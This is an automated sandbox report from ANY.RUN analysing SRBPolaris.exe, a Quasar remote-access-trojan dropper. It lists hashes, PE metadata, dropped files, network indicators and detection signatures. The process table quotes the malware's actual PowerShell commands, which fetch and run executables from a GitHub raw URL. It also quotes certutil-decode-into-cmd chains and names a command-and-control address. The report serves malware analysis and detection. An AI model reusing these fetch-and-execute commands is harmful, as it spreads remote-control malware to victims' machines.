Malware analysis SRBPolaris.exe Malicious activity | ANY.RUN

Add for printing

File name:	SRBPolaris.exe
Full analysis:	https://app.any.run/tasks/8ecac9b9-a002-4d35-aec8-6e52ab14cae0
Verdict:	Malicious activity
Threats:	Quasar is a very popular RAT in the world thanks to its code being available in open-source. This malware can be used to control the victim’s computer remotely. Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links. Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email. Malware Trends Tracker >>>
Analysis date:	November 29, 2020, 15:49:53
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:	autoit evasion trojan rat quasar
Indicators:
MIME:	application/x-dosexec
File info:	PE32 executable (GUI) Intel 80386, for MS Windows
MD5:	3AFFF85A45303658EDA635F50DE07667
SHA1:	705F08FA6901C050125D4919CF2686F465162347
SHA256:	1C5E90E974735C3E903D0923A1CD4133FB45E44A9C99043D8CDE1D7FD8562110
SSDEEP:	49152:KKEgmgN2xFg6gqFV06KCPtZFrmI8e3tjR+uCS+ysZShLz7f/+bMnEPUnFOrTJ:+gN2Tgw0bSZFrmCn+uCSkGzDjVM

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 300 seconds
Heavy Evasion option:: off
Network geolocation:: off
Additional time used:: 240 seconds
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 11.0.9600.17843 KB3058515
Adobe Acrobat Reader DC MUI (15.023.20070)
Adobe Flash Player 26 ActiveX (26.0.0.131)
Adobe Flash Player 26 NPAPI (26.0.0.131)
Adobe Flash Player 26 PPAPI (26.0.0.131)
Adobe Refresh Manager (1.8.0)
CCleaner (5.35)
FileZilla Client 3.36.0 (3.36.0)
Google Chrome (75.0.3770.100)
Google Update Helper (1.3.34.7)
Java 8 Update 92 (8.0.920.14)
Java Auto Updater (2.8.92.14)
Microsoft .NET Framework 4.7.2 (4.7.03062)
Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Access MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Groove MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office IME (Japanese) 2010 (14.0.4763.1000)
Microsoft Office IME (Korean) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (French) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (German) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Language Pack 2010 - French/Français (14.0.4763.1000)
Microsoft Office Language Pack 2010 - German/Deutsch (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Italian/Italiano (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Japanese/日本語 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Korean/한국어 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Portuguese/Português (Brasil) (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Russian/русский (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Spanish/Español (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Turkish/Türkçe (14.0.4763.1013)
Microsoft Office O MUI (French) 2010 (14.0.4763.1000)
Microsoft Office O MUI (German) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
Microsoft Office OneNote MUI (French) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (German) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Outlook MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
Microsoft Office PowerPoint MUI (French) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (German) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Professional 2010 (14.0.6029.1000)
Microsoft Office Proof (Arabic) 2010 (14.0.4763.1000)
Microsoft Office Proof (Basque) 2010 (14.0.4763.1000)
Microsoft Office Proof (Catalan) 2010 (14.0.4763.1000)
Microsoft Office Proof (Dutch) 2010 (14.0.4763.1000)
Microsoft Office Proof (English) 2010 (14.0.6029.1000)
Microsoft Office Proof (French) 2010 (14.0.6029.1000)
Microsoft Office Proof (Galician) 2010 (14.0.4763.1000)
Microsoft Office Proof (German) 2010 (14.0.4763.1000)
Microsoft Office Proof (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proof (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proof (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proof (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
Microsoft Office Proof (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Proof (Ukrainian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
Microsoft Office Proofing (French) 2010 (14.0.4763.1000)
Microsoft Office Proofing (German) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Publisher MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office SharePoint Designer MUI (French) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (German) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Single Image 2010 (14.0.6029.1000)
Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Word MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office X MUI (French) 2010 (14.0.4763.1000)
Microsoft Office X MUI (German) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2)
Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702)
Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702)
Mozilla Firefox 68.0.1 (x86 en-US) (68.0.1)
Notepad++ (32-bit x86) (7.5.1)
Opera 12.15 (12.15.1748)
Skype version 8.29 (8.29)
Update for Microsoft .NET Framework 4.7.2 (KB4087364) (1)
VLC media player (2.2.6)
WinRAR 5.60 (32-bit) (5.60.0)
srvpost (2.12.72)

Hotfixes

Client LanguagePack Package
Client Refresh LanguagePack Package
CodecPack Basic Package
Foundation Package
IE Hyphenation Parent Package English
IE Spelling Parent Package English
IE Troubleshooters Package
InternetExplorer Optional Package
InternetExplorer Package TopLevel
KB2533623
KB2534111
KB2639308
KB2729094
KB2731771
KB2786081
KB2834140
KB2882822
KB2888049
KB2999226
KB4019990
KB976902
LocalPack AU Package
LocalPack CA Package
LocalPack GB Package
LocalPack US Package
LocalPack ZA Package
PlatformUpdate Win7 SRV08R2 Package TopLevel
ProfessionalEdition
UltimateEdition

Add for printing

MALICIOUS
- Application was dropped or rewritten from another process
  - QZXm.exe (PID: 3920)
  - winlogon.com (PID: 2736)
  - winlogon.com (PID: 756)
- Runs app for hidden code execution
  - cmd.exe (PID: 3336)
- Runs PING.EXE for delay simulation
  - cmd.exe (PID: 2936)
- Writes to a start menu file
  - winlogon.com (PID: 756)
- QUASAR was detected
  - RegAsm.exe (PID: 2464)
SUSPICIOUS
- Executes PowerShell scripts
  - SRBPolaris.exe (PID: 2620)
- Starts CertUtil for decode files
  - cmd.exe (PID: 2936)
  - cmd.exe (PID: 3336)
- Creates files in the user directory
  - powershell.exe (PID: 1452)
  - powershell.exe (PID: 3200)
  - winlogon.com (PID: 756)
  - RegAsm.exe (PID: 2464)
- Drop AutoIt3 executable file
  - cmd.exe (PID: 2936)
  - winlogon.com (PID: 756)
- Application launched itself
  - cmd.exe (PID: 3336)
  - winlogon.com (PID: 2736)
- Starts CMD.EXE for commands execution
  - cmd.exe (PID: 3336)
  - QZXm.exe (PID: 3920)
- Starts application with an unusual extension
  - cmd.exe (PID: 2936)
  - winlogon.com (PID: 2736)
- Executable content was dropped or overwritten
  - cmd.exe (PID: 2936)
  - winlogon.com (PID: 756)
- Checks for external IP
  - RegAsm.exe (PID: 2464)
INFO
- Dropped object may contain Bitcoin addresses
  - certutil.exe (PID: 3696)
  - winlogon.com (PID: 756)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.exe	\|	Win32 Executable MS Visual C++ (generic) (42.2)
.exe	\|	Win64 Executable (generic) (37.3)
.dll	\|	Win32 Dynamic Link Library (generic) (8.8)
.exe	\|	Win32 Executable (generic) (6)
.exe	\|	Generic Win/DOS Executable (2.7)

EXIF

EXE

OriginalFileName:	Put Line.exe
InternalName:	Put Line
ProductVersion:	50.61.712
FileVersion:	50.61.712
ProductName:	Put Line Software
LegalTrademarks:	Put Line Software
LegalCopyright:	Put Line Software
FileDescription:	Put Line Software
CompanyName:	Put Line Software
Comments:	Put Line Software
CharacterSet:	Unicode
LanguageCode:	German
FileSubtype:	-
ObjectFileType:	Executable application
FileOS:	Win32
FileFlags:	(none)
FileFlagsMask:	0x0000
ProductVersionNumber:	50.61.71.2
FileVersionNumber:	50.61.71.2
Subsystem:	Windows GUI
SubsystemVersion:	5.1
ImageVersion:	6.3
OSVersion:	6.3
EntryPoint:	0x69d0
UninitializedDataSize:	-
InitializedDataSize:	3173888
CodeSize:	27136
LinkerVersion:	11
PEType:	PE32
TimeStamp:	2014:10:31 04:28:47+01:00
MachineType:	Intel 386 or later, and compatibles

Summary

Architecture:	IMAGE_FILE_MACHINE_I386
Subsystem:	IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date:	31-Oct-2014 03:28:47
Detected languages:	English - United States German - Germany Russian - Russia
Debug artifacts:	wextract.pdb
Comments:	Put Line Software
CompanyName:	Put Line Software
FileDescription:	Put Line Software
LegalCopyright:	Put Line Software
LegalTrademarks:	Put Line Software
ProductName:	Put Line Software
FileVersion:	50.61.712
ProductVersion:	50.61.712
InternalName:	Put Line
OriginalFilename:	Put Line.exe

DOS Header

Magic number:	MZ
Bytes on last page of file:	0x0090
Pages in file:	0x0003
Relocations:	0x0000
Size of header:	0x0004
Min extra paragraphs:	0x0000
Max extra paragraphs:	0xFFFF
Initial SS value:	0x0000
Initial SP value:	0x00B8
Checksum:	0x0000
Initial IP value:	0x0000
Initial CS value:	0x0000
Overlay number:	0x0000
OEM identifier:	0x0000
OEM information:	0x0000
Address of NE header:	0x000000F0

PE Headers

Signature:	PE
Machine:	IMAGE_FILE_MACHINE_I386
Number of sections:	5
Time date stamp:	31-Oct-2014 03:28:47
Pointer to Symbol Table:	0x00000000
Number of symbols:	0
Size of Optional Header:	0x00E0
Characteristics:	IMAGE_FILE_32BIT_MACHINE IMAGE_FILE_EXECUTABLE_IMAGE

Sections

Name	Virtual Address	Virtual Size	Raw Size	Charateristics	Entropy
.text	0x00001000	0x00006964	0x00006A00	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ	6.35038
.data	0x00008000	0x00001A8C	0x00000400	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE	3.17593
.idata	0x0000A000	0x0000107C	0x00001200	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ	5.04714
.rsrc	0x0000C000	0x00304DD7	0x00304E00	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ	7.99235
.reloc	0x00311000	0x000008C0	0x00000A00	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ	6.37329

Resources

Title	Entropy	Size	Codepage	Language	Type
1	5.05393	1511	Latin 1 / Western European	English - United States	RT_MANIFEST
2	3.15864	744	Latin 1 / Western European	English - United States	RT_ICON
3	3.07737	488	Latin 1 / Western European	English - United States	RT_ICON
4	3.50949	296	Latin 1 / Western European	English - United States	RT_ICON
5	5.56662	3752	Latin 1 / Western European	English - United States	RT_ICON
6	5.94251	2216	Latin 1 / Western European	English - United States	RT_ICON
7	5.99361	1736	Latin 1 / Western European	English - United States	RT_ICON
8	3.37828	1384	Latin 1 / Western European	English - United States	RT_ICON
9	7.98515	55762	Latin 1 / Western European	English - United States	RT_ICON
10	5.33023	9640	Latin 1 / Western European	English - United States	RT_ICON

Imports


ADVAPI32.dll
COMCTL32.dll
Cabinet.dll
GDI32.dll
KERNEL32.dll
USER32.dll
VERSION.dll
msvcrt.dll

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID	CMD	Path	Indicators	Parent process
2620	"C:\Users\admin\AppData\Local\Temp\SRBPolaris.exe"	C:\Users\admin\AppData\Local\Temp\SRBPolaris.exe	—	explorer.exe
User: admin Company: Put Line Software Integrity Level: MEDIUM Description: Put Line Software Exit code: 0 Version: 50.61.712
3200	powershell -command Import-Module BitsTransfer; Start-BitsTransfer -Source https://raw.githubusercontent.com/f926/f/main/bild4.exe,https://raw.githubusercontent.com/f926/f/main/SRBPolaris.exe -Destination QZXm.exe,Qk.exe;	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	—	SRBPolaris.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
1452	powershell -command Start-Process QZXm.exe; Start-Process Qk.exe;	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	—	SRBPolaris.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
3920	"C:\Users\admin\AppData\Local\Temp\IXP000.TMP\QZXm.exe"	C:\Users\admin\AppData\Local\Temp\IXP000.TMP\QZXm.exe	—	powershell.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Hma11 Lwyoncd Tuabkmogmj Exit code: 0 Version: 4.7.9326.03483 (krfzbzq_fmc.101045-8338)
2504	cmd /c nHqaWbz	C:\Windows\system32\cmd.exe	—	QZXm.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
3336	cmd /c certutil -decode 39-99 6-1 & cmd < 6-1	C:\Windows\system32\cmd.exe	—	QZXm.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2036	certutil -decode 39-99 6-1	C:\Windows\system32\certutil.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: CertUtil.exe Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
2936	cmd	C:\Windows\system32\cmd.exe		cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
3220	ping -n 1 VdCiOMe.VdCiOMe	C:\Windows\system32\PING.EXE	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: TCP/IP Ping Command Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
3696	certutil -decode 8-28 i	C:\Windows\system32\certutil.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: CertUtil.exe Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255)

Add for printing

Total events

900

Read events

774

Write events

Delete events

Modification events

No data

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
3200	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Q2VVKDNJQ3X5U7R78L0E.temp		—
		MD5:—	SHA256:—
1452	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FUKGDBBZ16O27DLRGUWP.temp		—
		MD5:—	SHA256:—
2620	SRBPolaris.exe	C:\Users\admin\AppData\Local\Temp\IXP000.TMP\mSoen.dat		text
		MD5:D4B94C1EAE4B8A7E379A8C1BBDE895E5	SHA256:6C7F53B9E765B61AD6725571B7AEA999524371E811C929E192D602427B016EDE
756	winlogon.com	C:\Users\admin\AppData\Roaming\OzrOnORARl\xsxQUOYDHS.js		text
		MD5:492F12D91A2CB3911D2BEE451259BA43	SHA256:29170E62129DBF1B4370F45C1D890909123F4F60D2ACC7FFC6CFCB024200D01E
3696	certutil.exe	C:\Users\admin\AppData\Local\Temp\IXP001.TMP\i		text
		MD5:3A42A9377900CDE0A04212DF6E45A37C	SHA256:B71F669CC117DBE100FEC339CF0BCF4B930B672D00D37FCCF43BC934B5E1B10F
3920	QZXm.exe	C:\Users\admin\AppData\Local\Temp\IXP001.TMP\70-6		image
		MD5:6BA8E5615AB5CA00BDBEC5125D88EECC	SHA256:46B8249FFDE2291F97487AC961E3F274AF76505841D2F4B8269E2A3960C7614F
1452	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF145080.TMP		binary
		MD5:8A05551124C6BDB2904F636A481BD6DC	SHA256:17F84075E9B6C27B21B0AB5C00A7D8AA84BBF291764A231BFB72DA223035E900
2036	certutil.exe	C:\Users\admin\AppData\Local\Temp\IXP001.TMP\6-1		text
		MD5:C2169F8ACE5F3E6E72038878BE00B992	SHA256:1CAA1ABFF6F5CF942C7373C690CECF4F27B5DB2CC7C6E165216BC9BDAE6FBA7E
3920	QZXm.exe	C:\Users\admin\AppData\Local\Temp\IXP001.TMP\23-0		binary
		MD5:AF6DCF0BAA4BE3B4371AB6F8159EB25F	SHA256:6E4E2F0D4F71C73E75C1E918E3C60806B802B7121CFB5959945624FE3B60EE05
2620	SRBPolaris.exe	C:\Users\admin\AppData\Local\Temp\IXP000.TMP\DKEp		binary
		MD5:E47246A50C3A2507D2BFD3ECD2689021	SHA256:E7F89C050A758BE7B5E0E2D9A24C99A9A30A7D596791C95B3CE4C6C0C12D0CDD

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
2464	RegAsm.exe	GET	200	208.95.112.1:80	http://ip-api.com/json/	unknown	text	288 b	shared

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
2464	RegAsm.exe	208.95.112.1:80	ip-api.com	IBURST	—	malicious
—	—	151.101.0.133:443	raw.githubusercontent.com	Fastly	US	malicious
2464	RegAsm.exe	94.242.224.249:222	—	root SA	LU	malicious

DNS requests

Domain	IP	Reputation
raw.githubusercontent.com	151.101.0.133 151.101.192.133 151.101.64.133 151.101.128.133	shared
VdCiOMe.VdCiOMe	—	unknown
yrNmYmLHuXeSriJvzdiRf.yrNmYmLHuXeSriJvzdiRf	—	unknown
ip-api.com	208.95.112.1	shared

Threats

PID	Process	Class	Message
2464	RegAsm.exe	Potential Corporate Privacy Violation	ET POLICY External IP Lookup ip-api.com
2464	RegAsm.exe	Potential Corporate Privacy Violation	AV POLICY Internal Host Retrieving External IP Address (ip-api. com)
2464	RegAsm.exe	A Network Trojan was detected	REMOTE [PTsecurity] Quasar.RAT IP Lookup
2464	RegAsm.exe	A Network Trojan was detected	REMOTE [PTsecurity] Quasar

1 ETPRO signatures available at the full report

Add for printing

No debug info

General Info

SRBPolaris.exe

3AFFF85A45303658EDA635F50DE07667

705F08FA6901C050125D4919CF2686F465162347

1C5E90E974735C3E903D0923A1CD4133FB45E44A9C99043D8CDE1D7FD8562110

49152:KKEgmgN2xFg6gqFV06KCPtZFrmI8e3tjR+uCS+ysZShLz7f/+bMnEPUnFOrTJ:+gN2Tgw0bSZFrmCn+uCSkGzDjVM

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Application was dropped or rewritten from another process

Runs app for hidden code execution

Runs PING.EXE for delay simulation

Writes to a start menu file

QUASAR was detected

SUSPICIOUS

Executes PowerShell scripts

Starts CertUtil for decode files

Creates files in the user directory

Drop AutoIt3 executable file

Application launched itself

Starts CMD.EXE for commands execution

Starts application with an unusual extension

Executable content was dropped or overwritten

Checks for external IP

INFO

Dropped object may contain Bitcoin addresses

Malware configuration

Static information

TRiD

EXIF

EXE

Summary

DOS Header

PE Headers

Sections

Resources

Imports

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings